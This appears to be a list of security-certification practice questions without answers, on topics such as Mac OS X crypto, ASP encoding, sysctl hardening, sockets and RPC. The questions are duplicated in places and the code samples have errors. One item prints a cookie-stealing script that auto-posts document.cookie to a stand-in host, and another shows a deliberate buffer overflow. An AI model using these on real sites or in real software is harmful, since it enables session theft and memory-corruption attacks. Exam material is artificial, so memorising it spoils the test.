What is the security and cryptographic framework used in Mac OS X called?
What is the security and cryptographic framework used in Mac OS X called?
What would Kevin accomplish by typing in the following command?
Kevin wants to use an SSL certificate from his Mac OS X server so that he can send and receive
encrypted email. What would Kevin accomplish by typing in the following command?
certtool c k=/Users/root/Library/Keychains/certkc
What will the following command accomplish?
Fred has just finished developing a number of ASP pages that will be posted to his company’s
website. Fred does not want the page’s source code viewed by anyone, so he decided to encode
the pages to make the source code unusable. What will the following command accomplish?
screnc /e asp *.* c:\tmp
What will this line accomplish?
Jacob is the system administrator for his company, managing over 20 Linux-based servers.
Jacob wants to ensure that his servers are secure so he decides to add the following line to the
/etc/sysctl.conf file:
net.ipv4.conf.all.rp_filter = 1
What will this line accomplish?
What type of problem or error will result from the following statement?
What type of problem or error will result from the following statement?
void f2b(void * arg, size_t len)
{
char buffer[100];
long val = …;
long *ptr = …;
extern void (*f)();
memcpy(buff, arg, len);
*ptr = val;
f();
return;
}
what level of compression must Gloria use?
Gloria is the lead operation manager for a movie production company in Las Vegas. She has
been asked with ensuring that the new movie created by the company will fit on one side of a DVD
disk that will be sold to the public. If the movie mentioned is a full-length production and must fit on
one side of the disk, what level of compression must Gloria use?
What functionality of the Oracle Identity Management system facilitates real-time integration of multiple dire
What functionality of the Oracle Identity Management system facilitates real-time integration of
multiple directories and user repositories through a single LDAP service?
In the following socket programming code, who will the server allow connections from?
In the following socket programming code, who will the server allow connections from?
int main(void)
{
int s1, s2;
s1 = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_port = htons(30);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;
bind(sockfd, (struct sockaddr *)&sin, sizeof(sin));
listen(sockfd, 10);
s2 = accept(sockfd, 10);
write(s2, “hello\n”, 6)
}
what function should be used?
When making a RPC function call on the local machine, what function should be used?
What has Gerald stumbled upon?
Gerald is a web security consultant for Protectors International. Gerald’s main responsibility is to
search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was
tipped off about a particular site and is now looking over its source code in a protected
environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled
upon?
<script>
document.write(‘<form name=hack method=post action=”http://
scarysite.com/getit.php”>
<input type=hidden name=sid value=”‘ + escape(document.cookie) +
‘”>’);
document.hack.submit();
</script>